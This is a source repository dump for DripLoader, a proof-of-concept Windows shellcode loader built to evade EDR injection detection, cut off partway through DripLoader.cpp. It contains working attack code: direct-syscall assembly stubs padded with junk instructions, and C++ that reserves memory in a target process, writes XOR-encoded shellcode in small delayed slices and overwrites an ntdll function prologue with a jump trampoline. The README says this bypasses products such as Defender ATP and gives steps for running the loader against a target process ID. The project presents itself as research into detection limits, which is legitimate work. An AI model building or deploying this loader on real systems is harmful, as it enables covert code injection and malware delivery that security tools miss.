├── DripLoader
    ├── NtThings.h
    ├── DripLoader.vcxproj.filters
    ├── NtdllWinX.asm
    ├── DripLoader.h
    ├── DripLoader.vcxproj
    ├── DripLoader.cpp
    └── Helpers.cpp
├── LICENSE
├── .github
    └── workflows
    │   └── msbuild.yml
├── DripLoader.sln
├── README.md
└── .gitattributes


/DripLoader/NtThings.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include <Windows.h>
 3 | 
 4 | #define STATUS_SUCCESS 0
 5 | 
 6 | EXTERN_C NTSTATUS ANtAVM (
 7 | 	HANDLE ProcessHandle,
 8 | 	PVOID* BaseAddress,
 9 | 	ULONG_PTR ZeroBits,
10 | 	PSIZE_T RegionSize,
11 | 	ULONG AllocationType,
12 | 	ULONG Protect
13 | );
14 | 
15 | EXTERN_C NTSTATUS ANtWVM (
16 | 	HANDLE hProcess,
17 | 	PVOID lpBaseAddress,
18 | 	PVOID lpBuffer,
19 | 	SIZE_T NumberOfBytesToRead,
20 | 	PSIZE_T NumberOfBytesRead
21 | );
22 | 
23 | EXTERN_C NTSTATUS ANtPVM (
24 | 	HANDLE ProcessHandle,
25 | 	PVOID* BaseAddress,
26 | 	SIZE_T* NumberOfBytesToProtect,
27 | 	ULONG NewAccessProtection,
28 | 	PULONG OldAccessProtection
29 | );
30 | 
31 | EXTERN_C NTSTATUS ANtCTE (
32 | 	HANDLE* pHandle, 
33 | 	ACCESS_MASK DesiredAccess, 
34 | 	PVOID pAttr, 
35 | 	HANDLE hProc, 
36 | 	PVOID pFunc,
37 | 	PVOID pArg,
38 | 	ULONG Flags, 
39 | 	SIZE_T ZeroBits, 
40 | 	SIZE_T StackSize, 
41 | 	SIZE_T MaxStackSize, 
42 | 	PVOID pAttrListOut
43 | );
44 | 
45 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2021 Filip Olszak
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/.github/workflows/msbuild.yml:
--------------------------------------------------------------------------------
 1 | name: MSBuild
 2 | 
 3 | on: [push]
 4 | 
 5 | env:
 6 |   # Path to the solution file relative to the root of the project.
 7 |   SOLUTION_FILE_PATH: .
 8 | 
 9 |   # Configuration type to build.
10 |   # You can convert this to a build matrix if you need coverage of multiple configuration types.
11 |   # https://docs.github.com/actions/learn-github-actions/managing-complex-workflows#using-a-build-matrix
12 |   BUILD_CONFIGURATION: Release
13 | 
14 | jobs:
15 |   build:
16 |     runs-on: windows-latest
17 | 
18 |     steps:
19 |     - uses: actions/checkout@v2
20 | 
21 |     - name: Add MSBuild to PATH
22 |       uses: microsoft/setup-msbuild@v1
23 | 
24 |     - name: Restore NuGet packages
25 |       working-directory: ${{env.GITHUB_WORKSPACE}}
26 |       run: nuget restore ${{env.SOLUTION_FILE_PATH}}
27 | 
28 |     - name: Build
29 |       working-directory: ${{env.GITHUB_WORKSPACE}}
30 |       # Add additional options to the MSBuild command line here (like platform or verbosity level).
31 |       # See https://docs.microsoft.com/visualstudio/msbuild/msbuild-command-line-reference
32 |       run: msbuild /m /p:Configuration=${{env.BUILD_CONFIGURATION}} ${{env.SOLUTION_FILE_PATH}}
33 | 


--------------------------------------------------------------------------------
/DripLoader.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.31112.23
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DripLoader", "DripLoader\DripLoader.vcxproj", "{B32C9AA8-139C-4529-9ED2-252FE7EAB0F9}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{B32C9AA8-139C-4529-9ED2-252FE7EAB0F9}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{B32C9AA8-139C-4529-9ED2-252FE7EAB0F9}.Debug|x64.Build.0 = Debug|x64
18 | 		{B32C9AA8-139C-4529-9ED2-252FE7EAB0F9}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{B32C9AA8-139C-4529-9ED2-252FE7EAB0F9}.Debug|x86.Build.0 = Debug|Win32
20 | 		{B32C9AA8-139C-4529-9ED2-252FE7EAB0F9}.Release|x64.ActiveCfg = Release|x64
21 | 		{B32C9AA8-139C-4529-9ED2-252FE7EAB0F9}.Release|x64.Build.0 = Release|x64
22 | 		{B32C9AA8-139C-4529-9ED2-252FE7EAB0F9}.Release|x86.ActiveCfg = Release|Win32
23 | 		{B32C9AA8-139C-4529-9ED2-252FE7EAB0F9}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {F4522440-A160-45C5-AED1-A19A32247E8B}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/DripLoader/DripLoader.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="DripLoader.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |     <ClCompile Include="Helpers.cpp">
22 |       <Filter>Source Files</Filter>
23 |     </ClCompile>
24 |   </ItemGroup>
25 |   <ItemGroup>
26 |     <ClInclude Include="NtThings.h">
27 |       <Filter>Header Files</Filter>
28 |     </ClInclude>
29 |     <ClInclude Include="DripLoader.h">
30 |       <Filter>Header Files</Filter>
31 |     </ClInclude>
32 |   </ItemGroup>
33 |   <ItemGroup>
34 |     <MASM Include="NtdllWinX.asm">
35 |       <Filter>Source Files</Filter>
36 |     </MASM>
37 |   </ItemGroup>
38 | </Project>


--------------------------------------------------------------------------------
/DripLoader/NtdllWinX.asm:
--------------------------------------------------------------------------------
 1 | .code
 2 | 
 3 |  ; by Filip Olszak (@_lpvoid)
 4 |  ; based on KiServiceTable from Windows 10.0.18363+
 5 |  
 6 |  ; compile with o p t i m i z a t i o n s turned off
 7 | 
 8 | 
 9 |  bye:
10 | 	ret
11 | 
12 | 		ANtAVM proc
13 | 			mov r8, r10
14 | 			mov r10, 01h
15 | 			xor r10, r10
16 | 			mov r10, 0Ah        
17 | 			mov r10, rcx
18 | 			xor eax, eax
19 | 			sub r8, r10
20 | 				add eax, 18h		; 1507+
21 | 			xor r8, r8
22 | 			syscall
23 | 			ret
24 | 		ANtAVM endp
25 | 
26 | 
27 | 		ANtWVM proc
28 | 			add rcx, 0Ah
29 | 			xor eax, eax
30 | 			mov r10, rcx
31 | 				add eax, 3Ah		; 1507+
32 | 			sub r10, 0Ah
33 | 			sub rcx, 0Ah
34 | 			syscall
35 | 			ret
36 | 		ANtWVM endp
37 | 
38 | 
39 | 		ANtPVM proc
40 | 			add r10, 1Ch
41 | 			xor eax, eax
42 | 			mov r10, rcx
43 | 			sub r10, 01h
44 | 				add eax, 50h		; 1507+
45 | 			add r10, 01h
46 | 			syscall
47 | 			ret
48 | 		ANtPVM endp
49 | 
50 | 
51 | 		ANtCTE proc
52 | 			mov r12, rcx
53 | 			mov r13, rdx
54 | 			mov r14, r8
55 | 			mov r15, r9
56 | 
57 | 			mov r10, rcx
58 | 			xor rax, rax
59 | 				add eax, 0C1h		; 2004, 20H2
60 | 			syscall
61 | 			cmp rax, 00
62 | 			je bye
63 | 
64 | 			mov rcx, r12
65 | 			mov rdx, r13
66 | 			mov r8, r14
67 | 			mov r9, r15
68 | 
69 | 			mov r10, rcx
70 | 			xor rax, rax
71 | 				add eax, 0BDh		; 1903, 1909
72 | 			syscall
73 | 			cmp rax, 00
74 | 			je bye
75 | 
76 | 			mov rcx, r12
77 | 			mov rdx, r13
78 | 			mov r8, r14
79 | 			mov r9, r15
80 | 
81 | 			mov r10, rcx
82 | 			xor rax, rax
83 | 				add eax, 0BCh		; 1809
84 | 			syscall
85 | 			cmp rax, 00
86 | 			je bye
87 | 		ANtCTE endp
88 | 		
89 | 
90 | 		end


--------------------------------------------------------------------------------
/DripLoader/DripLoader.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #define _CRT_SECURE_NO_WARNINGS
 3 | 
 4 | #include "NtThings.h"
 5 | 
 6 | #include <iostream>
 7 | #include <tchar.h>
 8 | #include <list>
 9 | #include <vector>
10 | #include <string>
11 | #include <Psapi.h>
12 | #include <VersionHelpers.h>
13 | #include <Shlwapi.h>
14 | 
15 | #pragma comment(lib, "Shlwapi.lib")
16 | 
17 | using std::cout;
18 | using std::cin;
19 | using std::list;
20 | using std::vector;
21 | 
22 | const int XOR_KEY{ 8 };
23 | 
24 | const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000,
25 |                                        (void*)0x0000000010000000,
26 |                                        (void*)0x0000000021000000,
27 |                                        (void*)0x0000000032000000,
28 |                                        (void*)0x0000000043000000,
29 |                                        (void*)0x0000000050000000,
30 |                                        (void*)0x0000000041000000,
31 |                                        (void*)0x0000000042000000,
32 |                                        (void*)0x0000000040000000,
33 |                                        (void*)0x0000000022000000 };
34 | 
35 | // Helpers.cpp
36 | LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD page_size, DWORD alloc_gran, DWORD vm_resv_c);
37 | unsigned char* ReadProcessBlob(const char* sc_filename, DWORD* sc_size);
38 | void DelayShowProgress(double percentage, int step, int step_time, int tpid, int time_needed, int vmbase);
39 | void EnableAnsiSupport();
40 | void PlayHeader();
41 | 
42 | const char PBAR[]{ "||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||" };
43 | const int  PBAR_WDH{ 60 };


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # DripLoader (PoC)
 2 | ![msbuild](https://github.com/xinbailu/DripLoader/actions/workflows/msbuild.yml/badge.svg)
 3 | 
 4 | Evasive shellcode loader for bypassing event-based injection detection, without necessarily suppressing event collection. The project is aiming to highlight limitations of event-driven injection identification, and show the need for more advanced memory scanning and smarter local agent software inventories in EDR.
 5 | 
 6 | ![image](https://user-images.githubusercontent.com/32537788/119597324-13a7fe00-bde1-11eb-987a-38180ad6574b.png)
 7 | 
 8 | ## DripLoader evades common EDRs by:
 9 | - using the most risky APIs possible like `NtAllocateVirtualMemory` and `NtCreateThreadEx`
10 | - blending in with call arguments to create events that vendors are forced to drop or log&ignore due to volume
11 | - avoiding multi-event correlation by introducing delays 
12 | 
13 | ## What does DripLoader do
14 | - Identifies a base address suitable for our payload
15 | - Reserves enough `AllocationGranularity` (64kB) sized, `NO_ACCESS` memory segments at the base address
16 | - Loops over those
17 |     - Allocating `PageSize` (4kB) sized, writable segments
18 |     - Writing shellcode
19 |     - Reprotecting as `RX`
20 | - Overwrites prologue of one `ntdll` function in the remote process memory space with a `jmp` to our base
21 | - Drops a thread on that trampoline 
22 | 
23 | I'll explain some of the thinking here: https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection
24 | 
25 | ## And so
26 | - It's able to fully bypass many EDR injection detections, including Defender ATP. 
27 | - Bypasses simple thread-centric scanners like `Get-InjectedThread`. Persisting within a process is another story, and this is up to the payload author. 
28 | - It is `sRDI`-compatible, but if your payload creates another local thread you will lose the benefit of thread start address in `ntdll`.
29 | 
30 | To test it out of the box
31 | - compile/download
32 | - XOR your binary shellcode blob file with default key 0x08, name it `blob.bin`
33 | - place both files in the same directory 
34 | - run it and follow the prompts or ./DripLoader.exe <target_pid> <delay_per_step_ms>
35 | 
36 | I attached an example `MessageBox` blob for your pleasure, be aware though it's size is unrealistically small for a payload.
37 | 


--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
 1 | ###############################################################################
 2 | # Set default behavior to automatically normalize line endings.
 3 | ###############################################################################
 4 | * text=auto
 5 | 
 6 | ###############################################################################
 7 | # Set default behavior for command prompt diff.
 8 | #
 9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs     diff=csharp
14 | 
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following 
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln       merge=binary
26 | #*.csproj    merge=binary
27 | #*.vbproj    merge=binary
28 | #*.vcxproj   merge=binary
29 | #*.vcproj    merge=binary
30 | #*.dbproj    merge=binary
31 | #*.fsproj    merge=binary
32 | #*.lsproj    merge=binary
33 | #*.wixproj   merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj   merge=binary
36 | #*.wwaproj   merge=binary
37 | 
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg   binary
44 | #*.png   binary
45 | #*.gif   binary
46 | 
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | # 
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the 
52 | # entries below.
53 | ###############################################################################
54 | #*.doc   diff=astextplain
55 | #*.DOC   diff=astextplain
56 | #*.docx  diff=astextplain
57 | #*.DOCX  diff=astextplain
58 | #*.dot   diff=astextplain
59 | #*.DOT   diff=astextplain
60 | #*.pdf   diff=astextplain
61 | #*.PDF   diff=astextplain
62 | #*.rtf   diff=astextplain
63 | #*.RTF   diff=astextplain
64 | 


--------------------------------------------------------------------------------
/DripLoader/DripLoader.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{b32c9aa8-139c-4529-9ed2-252fe7eab0f9}</ProjectGuid>
 25 |     <RootNamespace>DripLoader</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v142</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v142</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v142</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v142</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
 58 |   </ImportGroup>
 59 |   <ImportGroup Label="Shared">
 60 |   </ImportGroup>
 61 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 62 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 63 |   </ImportGroup>
 64 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 65 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 66 |   </ImportGroup>
 67 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 68 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 69 |   </ImportGroup>
 70 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 71 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 72 |   </ImportGroup>
 73 |   <PropertyGroup Label="UserMacros" />
 74 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 75 |     <LinkIncremental>true</LinkIncremental>
 76 |   </PropertyGroup>
 77 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 78 |     <LinkIncremental>false</LinkIncremental>
 79 |   </PropertyGroup>
 80 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 81 |     <LinkIncremental>true</LinkIncremental>
 82 |   </PropertyGroup>
 83 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 84 |     <LinkIncremental>false</LinkIncremental>
 85 |   </PropertyGroup>
 86 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 87 |     <ClCompile>
 88 |       <WarningLevel>Level3</WarningLevel>
 89 |       <SDLCheck>true</SDLCheck>
 90 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 91 |       <ConformanceMode>true</ConformanceMode>
 92 |     </ClCompile>
 93 |     <Link>
 94 |       <SubSystem>Console</SubSystem>
 95 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 96 |     </Link>
 97 |   </ItemDefinitionGroup>
 98 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 99 |     <ClCompile>
100 |       <WarningLevel>Level3</WarningLevel>
101 |       <FunctionLevelLinking>true</FunctionLevelLinking>
102 |       <IntrinsicFunctions>true</IntrinsicFunctions>
103 |       <SDLCheck>true</SDLCheck>
104 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
105 |       <ConformanceMode>true</ConformanceMode>
106 |     </ClCompile>
107 |     <Link>
108 |       <SubSystem>Console</SubSystem>
109 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
110 |       <OptimizeReferences>true</OptimizeReferences>
111 |       <GenerateDebugInformation>true</GenerateDebugInformation>
112 |     </Link>
113 |   </ItemDefinitionGroup>
114 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
115 |     <ClCompile>
116 |       <WarningLevel>Level3</WarningLevel>
117 |       <SDLCheck>true</SDLCheck>
118 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
119 |       <ConformanceMode>true</ConformanceMode>
120 |       <LanguageStandard>stdcpp17</LanguageStandard>
121 |     </ClCompile>
122 |     <Link>
123 |       <SubSystem>Console</SubSystem>
124 |       <GenerateDebugInformation>false</GenerateDebugInformation>
125 |     </Link>
126 |   </ItemDefinitionGroup>
127 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
128 |     <ClCompile>
129 |       <WarningLevel>Level3</WarningLevel>
130 |       <FunctionLevelLinking>true</FunctionLevelLinking>
131 |       <IntrinsicFunctions>true</IntrinsicFunctions>
132 |       <SDLCheck>true</SDLCheck>
133 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
134 |       <ConformanceMode>true</ConformanceMode>
135 |       <Optimization>Disabled</Optimization>
136 |       <LanguageStandard>stdcpp17</LanguageStandard>
137 |     </ClCompile>
138 |     <Link>
139 |       <SubSystem>Console</SubSystem>
140 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
141 |       <OptimizeReferences>true</OptimizeReferences>
142 |       <GenerateDebugInformation>false</GenerateDebugInformation>
143 |     </Link>
144 |   </ItemDefinitionGroup>
145 |   <ItemGroup>
146 |     <ClCompile Include="DripLoader.cpp" />
147 |     <ClCompile Include="Helpers.cpp" />
148 |   </ItemGroup>
149 |   <ItemGroup>
150 |     <ClInclude Include="DripLoader.h" />
151 |     <ClInclude Include="NtThings.h" />
152 |   </ItemGroup>
153 |   <ItemGroup>
154 |     <MASM Include="NtdllWinX.asm" />
155 |   </ItemGroup>
156 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
157 |   <ImportGroup Label="ExtensionTargets">
158 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
159 |   </ImportGroup>
160 | </Project>


--------------------------------------------------------------------------------
/DripLoader/DripLoader.cpp:
--------------------------------------------------------------------------------
  1 | #include "DripLoader.h"
  2 | 
  3 | // ntdll.dll
  4 | char jmpModName[]{ 'n','t','d','l','l','.','d','l','l','\0' };
  5 | // RtlpWow64CtxFromAmd64
  6 | char jmpFuncName[]{ 'R','t','l','p','W','o','w','6','4','C','t','x','F','r','o','m','A','m','d','6','4','\0' };
  7 | // blob.bin
  8 | char fnamScBlob[]{ 'b','l','o','b','.','b','i','n','\0' };
  9 | 
 10 | LPVOID PrepEntry(HANDLE hProc, LPVOID vm_base)
 11 | {
 12 |     unsigned char* b = (unsigned char*)&vm_base;
 13 | 
 14 |     unsigned char jmpSc[7]{
 15 |         0xB8, b[0], b[1], b[2], b[3],
 16 |         0xFF, 0xE0
 17 |     };
 18 | 
 19 |     // find the export EP offset
 20 |     HMODULE hJmpMod = LoadLibraryExA(
 21 |         jmpModName,
 22 |         NULL,
 23 |         DONT_RESOLVE_DLL_REFERENCES
 24 |     );
 25 | 
 26 |     if (!hJmpMod)
 27 |         return nullptr;
 28 | 
 29 |     LPVOID  lpDllExport = GetProcAddress(hJmpMod, jmpFuncName);
 30 | 
 31 |     DWORD   offsetJmpFunc = (DWORD)lpDllExport - (DWORD)hJmpMod;
 32 | 
 33 |     LPVOID  lpRemFuncEP{ 0 };
 34 | 
 35 |     HMODULE hMods[1024];
 36 |     DWORD   cbNeeded;
 37 |     char    szModName[MAX_PATH];
 38 |     
 39 |     if (EnumProcessModules(hProc, hMods, sizeof(hMods), &cbNeeded))
 40 |     {
 41 |         int i;
 42 |         for (i = 0; i < (cbNeeded / sizeof(HMODULE)); i++)
 43 |         {
 44 |             if (GetModuleFileNameExA(hProc, hMods[i], szModName, sizeof(szModName) / sizeof(char)))
 45 |             {
 46 |                 if (strcmp(PathFindFileNameA(szModName), jmpModName)==0) {
 47 |                     lpRemFuncEP = hMods[i];
 48 |                     break;
 49 |                 }
 50 |             }
 51 |         }
 52 |     }
 53 | 
 54 |     lpRemFuncEP = (LPVOID)((DWORD_PTR)lpRemFuncEP + offsetJmpFunc);
 55 | 
 56 |     if (NULL == lpRemFuncEP)
 57 |         return nullptr;
 58 | 
 59 |     SIZE_T szWritten{ 0 };
 60 |     WriteProcessMemory(
 61 |         hProc,
 62 |         lpDllExport,
 63 |         jmpSc,
 64 |         sizeof(jmpSc),
 65 |         &szWritten
 66 |     );
 67 | 
 68 |     return lpDllExport;
 69 | }
 70 | 
 71 | int run(int tpid, HANDLE hProc, DWORD szPage, DWORD szAllocGran, const char* fnam, int msStepDelay)
 72 | {
 73 |     DWORD szSc{ 0 };
 74 | 
 75 |     unsigned char* shellcode = ReadProcessBlob(fnam, &szSc);
 76 | 
 77 |     if (NULL == szSc)
 78 |         return 2;
 79 |     
 80 |     SIZE_T szVmResv{ szAllocGran };
 81 |     SIZE_T szVmCmm{ szPage };
 82 |     DWORD  cVmResv = (szSc / szVmResv) + 1;
 83 |     DWORD  cVmCmm = szVmResv / szVmCmm;
 84 | 
 85 |     LPVOID vmBaseAddress = GetSuitableBaseAddress(
 86 |         hProc, 
 87 |         szVmCmm, 
 88 |         szVmResv, 
 89 |         cVmResv
 90 |     );
 91 | 
 92 |     DWORD msTimeReq{ (msStepDelay * cVmResv) + (msStepDelay * cVmResv * cVmCmm) + (msStepDelay * 18) };
 93 | 
 94 |     if (nullptr == vmBaseAddress)
 95 |         return 3;
 96 | 
 97 |     double di;
 98 |     for (di = 0; di < 0.99; di += 0.33) {
 99 |         DelayShowProgress(di, 0, msStepDelay * 2, tpid, msTimeReq, (int)vmBaseAddress);
100 |     }
101 | 
102 |     NTSTATUS  status{ 0 };
103 |     DWORD     cmm_i;
104 |     LPVOID    currentVmBase{ vmBaseAddress };
105 |     
106 |     vector<LPVOID>  vcVmResv;
107 |     
108 |     // Reserve enough memory
109 |     DWORD i;
110 |     for (i = 1; i <= cVmResv; ++i) 
111 |     {
112 |         DelayShowProgress((1.0 / (double)cVmResv) * (double)i, 1, msStepDelay, tpid, msTimeReq, (int)vmBaseAddress);
113 | 
114 |         status = ANtAVM(
115 |             hProc,
116 |             &currentVmBase,
117 |             NULL, 
118 |             &szVmResv,
119 |             MEM_RESERVE, 
120 |             PAGE_NOACCESS
121 |         );
122 | 
123 |         if (STATUS_SUCCESS == status)
124 |             vcVmResv.push_back(currentVmBase);
125 |         else
126 |             return 4;
127 | 
128 |         currentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);
129 |     }
130 | 
131 |     DWORD           offsetSc{ 0 };
132 |     DWORD           oldProt;
133 | 
134 |     // Loop over the pages and commit our sc blob in 4kB slices
135 |     double prcDone{ 0 };
136 |     for (i = 0; i < cVmResv; ++i) 
